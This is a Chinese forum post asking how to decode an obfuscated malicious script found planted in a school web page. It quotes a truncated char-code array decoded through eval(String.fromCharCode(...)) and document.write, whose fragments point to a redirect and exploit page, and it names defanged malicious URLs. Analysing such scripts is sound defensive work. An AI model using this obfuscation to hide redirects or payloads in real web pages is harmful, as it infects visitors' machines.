========Title========
【求助】关于一个网页源代码的解密(类型:t=eval("String.fromCharCode("+t+")");)========Content========
一直对网页源代码有一定的兴趣。不过碰见加了密的源代码我就无从下手了......
今天才发现的隐藏在学校某页面的一个恶意网站。
网址:hxxp://www.tldy.net/kaxm.htm
先照抄斑竹轩辕小聪一段话(1):
提示:接触恶意网页有风险,如果直接用IE浏览器打开不经修改的带有恶意脚本的网页,又没有打好相应补丁的话,就等于直接把病毒“引进家门”。除非你真正有必要做这些甚至已经把它当成了“家常便饭”,否则绝不提倡去尝试。代码(“.....”为省略内容):<script>
t="60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,106,97,118,97,115,99,114,105,112,116,34,62,13,10
......
,25805,20316,31995,32479,20026,50,48,48,51,13,10,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114
......
5,20316,31995,32479,20026,50,75,44,25191,34892,50,75,30340,79,100,97,121,32593,39532,13,10,119,105,110,100,111,119,4
......
101,62,34,41,13,10,101,110,100,32,105,102,13,10,60,47,115,99,114,105,112,116,62,13,10,13,10"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
上次问斑竹轩辕小聪关于网页恶意脚本的加密与解密(1)后知道了ASCII码的重要性,所以这次一开始还以为是ASCII,只是拉到中间,“20316,31995,32479,20026”?ASCII本身并不是这样的啊?
因此就去baidu和google以关键词“t=eval("String.fromCharCode("+t+")");”搜索,却没有解密的方法......凭别人的回答(2),只是知道要解密,分两个步骤,第一步是把上述代码解密成ASCII码,然后第二步就是ASCII的解码了。
我现在想知道的是:
这类代码是如何利用String.fromCharCode?第一步是否也利用该函数把上述代码解密成ASCII码呢?如果是我们又应该如何利用该函数呢?如果不是,那又是如何解密呢?
=============
参考文章:
(1)、关于网页恶意脚本的加密与解密:
http://forum.ikaka.com/topic.asp?board=28&artid=8276445
顺带说说,文中所提的hxxp://www.bartenderofchina.com/gz/mm.htm恶意代码似乎有变动......
(2)、(已解密)谁能帮我把这段代码解密:
http://zhidao.baidu.com/question/18413046.html
(3)、(转自杭州志愿者taylor0577)网易摄友频道被挂马:
http://bbs.digi.163.com/banwu/809,1.html
(4)、Anatomy of a typical exploit
http://www.spybye.org/index.php?/archives/5-Anatomy-of-a-typical-exploit.html
(不知为什么,当右键想查看文章4所在的源代码时会被检测出含有病毒......如图)
